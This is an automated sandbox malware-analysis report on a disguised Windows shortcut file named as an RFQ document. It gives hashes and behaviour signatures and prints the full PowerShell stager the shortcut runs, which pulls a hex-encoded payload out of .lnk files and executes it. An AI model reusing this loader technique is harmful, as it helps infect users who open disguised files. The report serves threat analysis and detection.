Analysis
-
max time kernel
119s -
max time network
141s -
platform
windows7_x64 -
resource
win7-en-20210920 -
submitted
14-10-2021 12:17
Static task
static1
Behavioral task
behavioral1
Sample
2145RFQ14102021.rtf.lnk
Resource
win7-en-20210920
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
2145RFQ14102021.rtf.lnk
Resource
win10-en-20210920
windows10_x64
0 signatures
0 seconds
General
-
Target
2145RFQ14102021.rtf.lnk
-
Size
5.4MB
-
MD5
85e44c6e99f5f4043fc2c993b6fa633b
-
SHA1
21b3e0a10dd9798ef71fe073cdad7cfdadbfdeae
-
SHA256
62fab79e945bc629c110f21c9db37c8c0cc441ad15e73c1c1349fbef986b3789
-
SHA512
7c2f7183d40ac7bab91fa1a572c625e38e8f7ec848d54b7a937b6a33acc5868df3af72ae3a6187e8720303ff7aa7d00e7895ff77adfd504d8b394dacb34d30ff
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1880 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1880 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 1480 wrote to memory of 1880 1480 cmd.exe powershell.exe PID 1480 wrote to memory of 1880 1480 cmd.exe powershell.exe PID 1480 wrote to memory of 1880 1480 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\2145RFQ14102021.rtf.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function mT($gL) {$mW = $Null;Get-ChildItem $gL -Recurse -Depth 1 -ErrorAction 'SilentlyContinue' | ? {$_.extension -eq '.lnk'} | % {$yq = [String](Get-Content $_.FullName);$pH = 'VXJKUHSCSOQOTVAQOTOSEHMTYRYGQZIM';$lG = $yq.IndexOf($pH);if($lG -ne -1) {$Gc = $yq.SubString($lG);$mW = $Gc.Replace($pH,'')}};return $mW};function P($z) {$G = [Text.StringBuilder]::New();for($UzG=0;$UzG -lt $z.Length;$UzG+=2){[void]$G.Append([char][int]('0x'+$z.Substring($UzG,2)))}return $G.ToString()}$mW = mT $(Get-Location).Path;if($mW -eq $Null) {$mW = mT $($env:TEMP)};$wb = [ScriptBlock]::Create((P $mW));$wb.Invoke();2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1480-54-0x000007FEFB711000-0x000007FEFB713000-memory.dmpFilesize
8KB
-
memory/1880-55-0x0000000000000000-mapping.dmp
-
memory/1880-57-0x000007FEF2170000-0x000007FEF2CCD000-memory.dmpFilesize
11.4MB
-
memory/1880-61-0x0000000002554000-0x0000000002557000-memory.dmpFilesize
12KB
-
memory/1880-60-0x0000000002552000-0x0000000002554000-memory.dmpFilesize
8KB
-
memory/1880-59-0x0000000002550000-0x0000000002552000-memory.dmpFilesize
8KB
-
memory/1880-58-0x000000001B700000-0x000000001B9FF000-memory.dmpFilesize
3.0MB
-
memory/1880-62-0x000000000255B000-0x000000000257A000-memory.dmpFilesize
124KB
-
memory/1880-63-0x000000000257E000-0x000000000257F000-memory.dmpFilesize
4KB